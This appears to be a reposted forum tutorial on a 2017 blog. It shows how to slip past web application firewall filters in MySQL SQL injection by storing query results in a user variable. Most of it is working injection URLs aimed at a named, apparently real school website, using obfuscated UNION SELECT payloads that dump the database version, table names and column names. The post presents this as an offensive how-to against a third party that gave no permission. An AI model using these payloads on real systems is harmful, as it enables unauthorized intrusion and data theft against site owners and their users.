Newest Post

// Posted by :Unknown // On :Senin, 13 Februari 2017

hello frnds,

today we will discuss about how to bypass hard waf filters with local varaible when regular formats for dumping data are not working then this is a best alternative to try to bypass hard filters and it wont work everytime ******

ok lets start.***

ill explain it on a live site,

site>>  http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=8

and i got the vulnerable coloumns

http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,3,4--+

and lets dump tables and coloumns


http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),4--+

result >>   403 forbidden

we have tried all the ways to bypass waf but didnt worked, now lets try with local variable.***


Local variable is a simply a value holder, it will hold a certain value and it will give output when command is executed,so lets see it practically,


see the below query i opned a variable with name "sqli" and stored a value there , and i placed that variable in the vulnerable coloumn which will show output when query is executed.*** 

http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=.8' and @sqli:=(seLeCt concat/**/(version())) /*!50000UNION*/+SELECT+1,2,@sqli,4--+

output

[Image: vxu1l.png]




like wise now lets dump data [tables and coloumns]



http://www.kantipurinternational.edu.np/....php?id=.8' and @sqli:=(select /*!50000GrOUp_ConCat(0x3c6c693e,/*!50000table_naMe*/,0x20203a3a2020,/*!50000ColuMN_naMe*/) FrOm /*!50000information_schema.columns*/ where table_schema=database/**_**/()) /*!50000UNION*/+SELECT+1,2,@sqli,4--+





and the output

[Image: 2q8964g.png]


hope u are clear with this and thats all for this tutorial Smile

my next tutorial will be on bypassing hard waf filters with cookie based injection.***

plzz give ur feedback about my tutorial

thank u 

cyaa ! Smile

source http://forum.sqliwiki.com/showthread.php?tid=4164

Leave a Reply

Subscribe to Posts | Subscribe to Comments

// Copyright © 2012 Catatan seorang newbie //Anime-Note//Powered by Blogger // Designed by Johanes Djogan //